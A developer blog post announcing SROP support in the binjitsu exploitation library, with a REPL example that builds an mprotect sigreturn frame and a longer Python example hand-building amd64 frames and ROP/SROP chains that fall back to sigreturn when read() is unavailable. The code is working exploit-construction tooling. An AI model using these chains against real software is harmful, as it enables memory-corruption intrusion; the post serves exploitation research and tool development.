So far I've been working on adding SROP (Sigreturn-Oriented Programming) support to binjitsu for the x86 and x64 platforms, and it's been merged into the main branch. You can see the code here!
If you wish to use binjitsu to create an SROP frame, you can now simply do something along the lines of:
>>> from pwn import *
>>> context.arch = "amd64"
>>> s = SigreturnFrame(arch="amd64")
>>> s.set_regvalue("rax", 0xa)
>>> s.set_regvalue("rdi", 0x00601000)
>>> s.set_regvalue("rsi", 0x1000)
>>> s.set_regvalue("rdx", 0x7)
>>> frame = s.get_frame()
>>> assert len(frame) == 248
On x86_64 syscall number 0xa is mprotect, so the frame above sets up mprotect(0x601000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC). Before dropping it into a chain you also want rip set to a syscall gadget and rsp set to wherever execution should continue once the syscall returns.
We hope you find this functionality useful!
Another little something I've been working on is an interesting idea suggested by ebeip90: integrating SROP into rop.py. The idea would be along the lines of what's described here. An excerpt from the GitHub issue:
"In the event that read is not an exported symbol in any of the available libraries (e.g. if libc is not provided) but a syscall gadget is available, it should transparently switch to SROP without the user knowing."
It's a WIP and you can view the current state at the pull request I've created here.
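To make concrete both what get_frame() produces and what the rop.py fallback above has to decide, here is an added example that is not binjitsu's code: a minimal stand-in for SigreturnFrame built with struct, using the amd64 field offsets the library's 248-byte frame follows, plus a read_chain() helper that takes the normal read() path when the symbol is known and otherwise emits an SROP chain. The gadget addresses, symbol table and the assumption that the syscall gadget is `syscall; ret` are all constructed for the example.

```python
import struct

# Byte offsets of each field in the amd64 sigreturn frame, i.e. the ucontext
# that rt_sigreturn reads from the stack. This mirrors the layout used by the
# binjitsu/pwntools amd64 SigreturnFrame: 31 qwords, 248 bytes in total.
AMD64_FRAME_OFFSETS = {
    "uc_flags": 0, "&uc": 8,
    "uc_stack.ss_sp": 16, "uc_stack.ss_flags": 24, "uc_stack.ss_size": 32,
    "r8": 40, "r9": 48, "r10": 56, "r11": 64,
    "r12": 72, "r13": 80, "r14": 88, "r15": 96,
    "rdi": 104, "rsi": 112, "rbp": 120, "rbx": 128,
    "rdx": 136, "rax": 144, "rcx": 152, "rsp": 160, "rip": 168,
    "eflags": 176, "csgsfs": 184, "err": 192, "trapno": 200,
    "oldmask": 208, "cr2": 216, "&fpstate": 224, "__reserved": 232,
    "sigmask": 240,
}
AMD64_FRAME_SIZE = 248

# x86_64 syscall numbers used below.
SYS_READ = 0
SYS_MPROTECT = 10
SYS_RT_SIGRETURN = 15


def p64(value):
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


class MiniSigreturnFrame:
    """Hand-rolled amd64 frame; same set_regvalue/get_frame shape as the post."""

    def __init__(self):
        self.values = dict.fromkeys(AMD64_FRAME_OFFSETS, 0)
        # csgsfs must carry the user-mode code segment selector (0x33),
        # otherwise the restored context faults as soon as it runs.
        self.values["csgsfs"] = 0x33

    def set_regvalue(self, reg, value):
        if reg not in self.values:
            raise KeyError("unknown amd64 frame field: %s" % reg)
        self.values[reg] = value & 0xFFFFFFFFFFFFFFFF

    def get_frame(self):
        buf = bytearray(AMD64_FRAME_SIZE)
        for name, off in AMD64_FRAME_OFFSETS.items():
            struct.pack_into("<Q", buf, off, self.values[name])
        return bytes(buf)

    def __len__(self):
        return AMD64_FRAME_SIZE


def parse_frame(frame):
    """Inverse of get_frame: shows exactly which context a frame restores."""
    if len(frame) != AMD64_FRAME_SIZE:
        raise ValueError("expected a %d-byte amd64 frame" % AMD64_FRAME_SIZE)
    return {name: struct.unpack_from("<Q", frame, off)[0]
            for name, off in AMD64_FRAME_OFFSETS.items()}


def srop_chain(pop_rax_ret, syscall_gadget, frame):
    """Stack the exploit writes: rax <- 15 (rt_sigreturn), return into
    `syscall`, and the frame sits exactly where rsp points when the kernel
    services the sigreturn."""
    return p64(pop_rax_ret) + p64(SYS_RT_SIGRETURN) + p64(syscall_gadget) + frame


def read_chain(symbols, gadgets, fd, buf, n, next_rsp):
    """Decision the issue describes. `symbols` maps names to addresses and
    `gadgets` holds "pop rdi", "pop rsi", "pop rdx", "pop rax" and "syscall"
    (assumed to be `syscall; ret`), all constructed for this example."""
    if "read" in symbols:
        # Ordinary ROP call: load the three argument registers, then call read.
        chain = (p64(gadgets["pop rdi"]) + p64(fd)
                 + p64(gadgets["pop rsi"]) + p64(buf)
                 + p64(gadgets["pop rdx"]) + p64(n)
                 + p64(symbols["read"]))
        return "call", chain
    # No read symbol: let the kernel load the registers for us via sigreturn,
    # then resume at the syscall gadget with rsp pointing at the next chain.
    f = MiniSigreturnFrame()
    f.set_regvalue("rax", SYS_READ)
    f.set_regvalue("rdi", fd)
    f.set_regvalue("rsi", buf)
    f.set_regvalue("rdx", n)
    f.set_regvalue("rip", gadgets["syscall"])
    f.set_regvalue("rsp", next_rsp)
    return "srop", srop_chain(gadgets["pop rax"], gadgets["syscall"], f.get_frame())


if __name__ == "__main__":
    # Reproduce the post's mprotect frame and show what it restores.
    s = MiniSigreturnFrame()
    s.set_regvalue("rax", SYS_MPROTECT)
    s.set_regvalue("rdi", 0x00601000)
    s.set_regvalue("rsi", 0x1000)
    s.set_regvalue("rdx", 0x7)
    for name, val in parse_frame(s.get_frame()).items():
        if val:
            print("%-18s 0x%x" % (name, val))
```

parse_frame() is the check worth running on any frame before sending it: if rip, rsp or csgsfs come back as zero you have a frame that will crash on restore rather than a chain that continues.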
Cheers!